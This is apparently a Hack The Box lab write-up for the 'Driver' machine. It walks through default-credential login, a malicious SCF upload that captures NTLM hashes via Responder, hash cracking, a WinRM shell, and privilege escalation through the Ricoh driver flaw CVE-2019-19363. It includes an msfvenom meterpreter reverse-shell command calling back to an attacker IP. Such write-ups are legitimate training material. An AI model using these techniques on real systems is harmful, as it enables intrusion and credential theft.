# DRIVER | 10.10.11.106

## Enumeration

    sudo nmap -v -T4 -sC -sV -oN nmap-initial IP

### Ports and Services

![nmap image](img/nmap.png)

#### 80 - HTTP - IIS 10.0

This page asks for credentials right away. As a guess I did 'admin:admin' and they let me through. It is a printer firmware upload page, which runs PHP.

![root page](img/port-80-10.10.11.106.png)

Only one link, which leads to the firmware upload page itself:

![firmware upload page](img/upload-page.png)

#### 135 - MSRPC

Standard RPC port open. Can try enumerating with rpcclient. But got access denied.

#### 445 - SMB

Can try enumerating this as a null or gues user with smbclient. But founf guest account disabled, null account access denied. Trying with 'admin:admin' is a failure.

#### 5985 - WINRM

Note this for later - this port allows for a Windows Remote Management shell.

## Exploitation

My guess is I am supposed to upload something malicious in order to gain code execution or a shell. It might allow simple PHP scripts to be uploaded; or I may have to upload a firmware file that has been tampered with. Messing around with this nets no pingbacks or connections. The text on the page notes that the file gets uploaded to the file share (so, the SMB share), so we have to work with that.

Knowing that the file will be looked at in a file share, there is a way to steal hashes by creating a malicious SCF (shell command file). We can make it connect back to our machine, that will be listening on port 445.

### Exploit Method

First step is to create the SCF. There are tons of examples out there. Mine is pretty simple:

![malicious SCF](img/firmware.png)

Then, start responder on the tun0 interface. Responder will create many listeners, including one port 445 for SMB.

`sudo responder -I tun0`

Then, upload the SCF, and pretty much right away we get a hash for a user named Tony:

![Tony's hash](img/tony-hash.png)

I brought this hash over to my cracking machine and used hashcat with the rockyou wordlist, and it found the password, so now we have valid creds.

![cracked hash](img/cracked.png)

I used the creds in crackmapexec (checking smb and winrm) and we have successfully owned this user (via winrm):

![winrm pwn](img/cme-winrm.png)

So now I can log in using evil-winrm as tony, and have shell access.

![Evil winrm shell as tony](img/winrm-shell.png)

## Privilege Escalation - tony > administrator

### Further Enumeration

In the local appdata folder for Tony there is a batch script that runs every time Tony logs on.

![enum](img/wpenum1.png)

![scripts](img/scripts.png)

### Exploit method

I am going to try to replace the contents of the 'quit.ps1' file with a reverse shell command, and see what I can get from that.

I will use the reverse TCP oneliner from Nishang.

After doing this I did get a shell back, but as tony. I suppose the output from winPEAS misled me as I thought it was running the batch script as administrator, but it is not. This turns out to just be the script that looks at the file share and pretty much gives us the hash earlier, so a dead-end when it comes to privesc. Back to enumerating.

### More enumeration

The winPEAS output indicated a Powershell history file.

![PS History](img/ps-history.png)

Reading the history indicates that a printer was installed, so let's google this.

![Installed printer](img/history.png)

I find [this](https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/) post, which details that the installation of the driver creates a world-writable directory.

![RICOH-DRV incorrect perms](img/dirs.png)

### Exploit Method

Since this exploit exists as a Metasploit module, first I will need a Meterpreter session.

1. Generate payload in msfvenom.

    `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=9999 -f exe -o koopa.exe`

2. Upload exe to machine via evil-winrm

3. Use exploit/multi/handler in msfconsole; run it

4. Execute exe on machine to get meterpreter session

![meterpreter session](img/meterpreter.png)

Next I backgrounded the session and searched for the ricoh privesc, then configured the options and ran check:

![ricoh privesc check](img/check.png)

That confirms that the machine is vulnerable. 

Running the exploit hangs, and that is because in this case we need to migrate the meterpreter session from session 0 to 1 by moving into a process with a session 1, in this case explorer.exe. Once that is done, the exploit works perfectly:

![exploit success](img/exploit.png)

We now have a session as NT\AUTHORITY and we are therefore root.

![root flag](img/flag.png)

## Conclusion

Overall an easy box, but one I had to do slowly as I had been away from HTB and enumerating for a while. Enumeration is like a muscle you need to keep exercising otherwise it atrophies.

**Steps taken:**

* Find firmware upload form
* Upload malicious SCF to file share, get hash, crack hash, get shell
* Enumerate to find PS History, find printer was installed
* Research exploit
* Convert to Metasploit for easy pwnage
